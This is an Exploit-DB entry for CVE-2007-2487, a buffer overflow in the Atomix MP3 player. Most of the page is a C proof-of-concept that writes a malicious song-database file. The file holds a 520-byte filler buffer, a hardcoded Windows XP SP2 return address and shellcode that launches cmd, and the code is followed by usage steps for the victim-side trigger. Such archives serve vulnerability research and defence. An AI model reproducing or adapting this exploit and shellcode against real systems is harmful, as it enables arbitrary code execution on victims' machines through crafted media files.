Atomix MP3 - '.MP3' File Buffer Overflow

EDB-ID:

29942

CVE:

2007-2487

EDB Verified:

Author:

preth00nker

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2007-05-02

Vulnerable App: 
// source: https://www.securityfocus.com/bid/23756/info

Atomix MP3 is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.

An attacker could exploit this issue by enticing a victim to load a malicious MP3 file. If successful, the attacker can execute arbitrary code in the context of the affected application.

////////////////////////////////// [ STARTING CODE ]
////////////////////////////////////////////////////
////
////  [ Explanation ] this probe of concept make 
////  a malicious file that exploit the error.
////  
////
////  [ Note ] 
////  it was coded for Windows XP with SP2-es
////  if you want to try it into your own PC
////  it is necessary that you change this Offsets 
////  for your own offsets.
////
////     on: 
////  char offset[]="";
////     AND
////  mov ebx,0x77BF93C7
////
////                Enjoy it n_nU!..
////    Coded by preth00nker (using Mexican skill!)

#include <stdio.h>
#include <conio.h>
#include <string.h>

char shellcode[] =     //A simple CMD Call =)
"\x55"                 //push ebp
"\x8B\xEC"             //mov ebp,esp
"\x33\xFF"             //xor edi,edi
"\x57"                 //push edi
"\xC6\x45\xFC\x63"     //mov byte ptr [ebp-04h],63h
"\xC6\x45\xFD\x6D"     //mov byte ptr [ebp-03h],6Dh
"\xC6\x45\xFE\x64"     //mov byte ptr [ebp-02h],64h
"\x8D\x45\xFC"         //lea eax,[ebp-04h]
"\x50"                 //push eax
"\xBB\xC7\x93\xBF\x77" //mov ebx,0x77BF93C7
"\xFF\xD3";            //call ebx


                       /*Evilbuffer - 520 Bytes Free4exploit*/
char evilbuffer[521] = "";
                       /*Data Base for songs found into the computer*/
char file[]          = "mp3database.txt"; 
                       /*Call ESP SP2-es*/
char offset[]        = "\x8B\x51\x81\x7C";
char temp[1024];

int main(){
    printf("\n\n##################################################\n");
    printf("######\n");    
    printf("######          Exploit Atomix 2.3\n");    
    printf("######             By Preth00nker\n");    
    printf("######     Preth00nker [at] gmail [dot] com\n");    
    printf("######         http://www.mexhackteam.org\n\n\n");
    printf("######         http://www.prethoonker.tk\n\n\n");
    FILE *fich;
   	memset(evilbuffer,'M',520);
    fich=fopen(file,"w+");
    printf(" (*) Creating the file: %s\n", file);
    strcpy(temp,evilbuffer);
    printf(" (*) Adding the evilbuffer\n");
    strcat(temp,offset);
    printf(" (*) Adding the Offset: %s\n", offset);
    strcat(temp,shellcode);
    printf(" (*) Adding the Sellcode\n");
    fwrite(temp, strlen(temp),1, fich);
    printf(" (*) Writting into the file\n");
    printf("      [ Usage: ]\n");    
    printf("Step 1.- Generate the Evil File into the %ProgramFiles%\\AtomixMP3\\ \n");    
    printf("Step 2.- Run atomixmp3.exe\n");    
    printf("Step 3.- Click On Search module and Click (again) on the unique file found.\n");
    printf("have fun =)!");
    fclose(fich);   
    return 0;
}
////
////
////////////////////////////////////////// [ E O F ]
////////////////////////////////////////////////////
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services